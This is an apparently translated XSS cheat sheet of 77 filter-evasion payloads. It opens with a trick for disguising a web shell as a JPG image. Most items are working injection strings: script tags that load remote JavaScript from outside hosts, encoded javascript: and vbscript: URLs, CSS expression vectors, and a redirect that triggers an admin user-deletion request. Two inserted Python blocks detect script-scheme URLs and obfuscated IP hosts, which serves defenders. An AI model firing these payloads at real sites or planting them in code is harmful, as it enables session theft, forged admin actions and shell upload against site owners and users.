Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Add this code to the first line of the shell file, then rename the shell to a JPG image; when the image-format shell is accessed, our shell still executes.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multiline injected JavaScript using embedded characters; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

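As an added defensive check, not part of the original cheat sheet: the case changes, character references, embedded tab/newline/CR/null bytes and leading spaces in items 3 to 19 all defeat filters that compare the scheme literally, so a filter has to normalise the attribute value first. The attribute list and the sample markup below are assumptions made for this example.

```python
import html
import re
from html.parser import HTMLParser

# Attributes the vectors above use to carry a URL (assumed list for this example; extend it for your templates):
# IMG/INPUT/IFRAME SRC, IMG DYNSRC/LOWSRC, BODY/TABLE/TD BACKGROUND, A/LINK/BASE HREF.
URL_ATTRS = {"src", "dynsrc", "lowsrc", "href", "background"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:")
# Browsers skip ASCII control characters and spaces (code points 0-32) while reading the scheme,
# which is what the embedded tab/newline/CR/null and leading-space vectors rely on.
_JUNK = re.compile(r"[\x00-\x20]")

def _strip_and_lower(value: str) -> str:
    """Drop the characters browsers ignore and fold case, so JaVaScRiPt: and jav<TAB>ascript: compare equal."""
    return _JUNK.sub("", value).lower()

def is_script_url(raw_value: str) -> bool:
    """True if a raw attribute value resolves to a javascript:/vbscript: URL.
    html.unescape() decodes decimal and hex character references with or without the trailing
    semicolon, which covers the entity-encoded forms in items 5 and 8-10."""
    return _strip_and_lower(html.unescape(raw_value)).startswith(SCRIPT_SCHEMES)

class ScriptUrlFinder(HTMLParser):
    """Record (tag, attribute, value) for every URL-bearing attribute that carries a script scheme."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # HTMLParser has already decoded entities in attribute values, so only strip and fold here.
            if name in URL_ATTRS and value and _strip_and_lower(value).startswith(SCRIPT_SCHEMES):
                self.hits.append((tag, name, value))

def find_script_urls(markup: str) -> list[tuple[str, str, str]]:
    """Scan a markup fragment (sanitizer output, a stored comment) for script-scheme URLs."""
    finder = ScriptUrlFinder()
    finder.feed(markup)
    finder.close()
    return finder.hits

# Constructed sample: three obfuscated vectors from the list above plus one harmless link.
SAMPLE = (
    "<IMG SRC=\"JaVaScRiPt:alert('XSS')\">"
    "<A HREF=\"http://3w.org/XSS/\">plain link</A>"
    "<BODY BACKGROUND=\"jav\tascript:alert('XSS')\">"
    "<IMG SRC=\"&#x6A;&#97;vascript:alert('XSS')\">"
)
```

Run `find_script_urls(SAMPLE)` to see the three flagged attributes; the plain `http://` link is not reported.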
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) End title tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE attribute (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript inside Flash, your XSS code can be mixed in
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and load it that way
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as a decimal number
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
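An added example, not from the original list: items 70 to 77 show host notations that defeat a naive string allowlist for outbound links (one decimal dword, hex and octal components, a mix of them, a protocol-relative URL, a trailing dot and a javascript: scheme), so a link checker must canonicalise the host before comparing it. The allowlist policy in `link_allowed` is an assumption made for this example.

```python
import re
from urllib.parse import urlsplit

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")
_DEC = re.compile(r"[1-9][0-9]*")

def _ipv4_part(part: str):
    """Value of one dotted component under inet_aton() rules: 0x... hex, leading 0 octal, else decimal; None if invalid."""
    if _HEX.fullmatch(part):
        return int(part[2:], 16)
    if _OCT.fullmatch(part):          # also covers a bare "0"
        return int(part, 8)
    if _DEC.fullmatch(part):
        return int(part, 10)
    return None                       # "08", "", letters: not an IPv4 component

def canonical_ipv4(host: str):
    """Dotted-decimal form of an IPv4 literal written as a dword, hex, octal or a mix (items 70-73), else None.
    Follows inet_aton(): a.b.c.d, a.b.c (c fills 16 bits), a.b (b fills 24 bits) and a (32-bit dword)."""
    parts = host.split(".")
    values = [_ipv4_part(p) for p in parts]
    if not 1 <= len(parts) <= 4 or None in values:
        return None
    *head, last = values
    last_bits = 8 * (5 - len(parts))              # bits the final component has to fill
    if any(v > 255 for v in head) or last >= 1 << last_bits:
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << last_bits) | last
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))

def canonical_host(link: str):
    """Host a browser would contact for a link target, canonicalised for comparison: a protocol-relative
    link (item 74) is read as https, the trailing dot of an absolute DNS name (item 76) is removed, the
    name is lower-cased and IPv4 literals become dotted decimal. Non-http(s) schemes (item 77) give None."""
    if link.startswith("//"):
        link = "https:" + link
    parts = urlsplit(link)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    host = parts.hostname.rstrip(".")             # urlsplit().hostname is already lower-cased
    return canonical_ipv4(host) or host

def link_allowed(link: str, allowed_hosts: frozenset) -> bool:
    """Allowlist check the notations above cannot fool (assumed policy for this example: exact host match)."""
    host = canonical_host(link)
    return host is not None and host in allowed_hosts
```

The three literals from items 70 to 72 all canonicalise to 192.168.0.1, and the mixed form from item 73 (without its embedded whitespace) to 66.102.7.147.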